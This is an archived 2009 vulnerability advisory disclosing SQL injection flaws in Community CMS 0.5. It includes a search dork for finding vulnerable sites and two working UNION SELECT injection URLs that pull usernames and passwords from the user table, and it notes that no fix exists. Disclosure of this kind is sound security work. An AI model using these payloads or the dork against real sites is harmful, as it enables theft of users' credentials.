TUCoPS :: Web :: CMS / Portals :: va3009.htm

Community CMS 0.5 Multiple SQL Injection Vulnerabilities
Community CMS 0.5 Multiple SQL Injection Vulnerabilities
Community CMS 0.5 Multiple SQL Injection Vulnerabilities



--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Community CMS
[+] Version: 0.5
[+] Website: http://sourceforge.net/projects/communitycms/ 

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] SQL Injection

[-] File affected: view.php, calendar.php

This bug allows a guest to view username and
password of a registered user.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 
1,2,username,password,5,6,7,8,9 FROM comcms_users

http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL 
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=US-ASCII; 
	name="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Disposition: attachment; 
	filename="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fsxky3lr0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDb21tdW5pdHkgQ01TClsrXSBWZXJzaW9uOiAwLjUKWytdIFdlYnNpdGU6IGh0
dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvY29tbXVuaXR5Y21zLwoKWytdIEJ1Z3M6IFtB
XSBNdWx0aXBsZSBTUUwgSW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERv
cms6IGludGV4dDoiUG93ZXJlZCBieSBDb21tdW5pdHkgQ01TIgpbK10gRGF0ZTogMzAgTWFyIDIw
MDkKClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10g
QXV0aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQ29udGFjdDogZS1tYWls
OiBkcm9zb3BoaWxheHh4QGdtYWlsLmNvbQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioKClsrXSBNZW51CgoxKSBCdWdzCjIpIENvZGUKMykgRml4CgoK
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEJ1
Z3MKCgotIFtBXSBTUUwgSW5qZWN0aW9uCgpbLV0gRmlsZSBhZmZlY3RlZDogdmlldy5waHAsIGNh
bGVuZGFyLnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gdmlldyB1c2VybmFtZSBhbmQK
cGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVzZXIuCgoKKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBsZSBTUUwg
SW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlldy5waHA/YXJ0aWNsZV9pZD0t
MSBVTklPTiBBTEwgU0VMRUNUIDEsMix1c2VybmFtZSxwYXNzd29yZCw1LDYsNyw4LDkgRlJPTSBj
b21jbXNfdXNlcnMKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/aWQ9MiZ2aWV3
PWV2ZW50JmE9LTEgVU5JT04gQUxMIFNFTEVDVCAxLDIsMyw0LDUsNiw3LENPTkNBVCh1c2VybmFt
ZSwgMHgzYSwgcGFzc3dvcmQpLE5VTEwsTlVMTCxOVUxMLDEyLDEzLE5VTEwgRlJPTSBjb21jbXNf
dXNlcnMlMjMKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKg=--001636c5b2f0d8529804665b7783--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH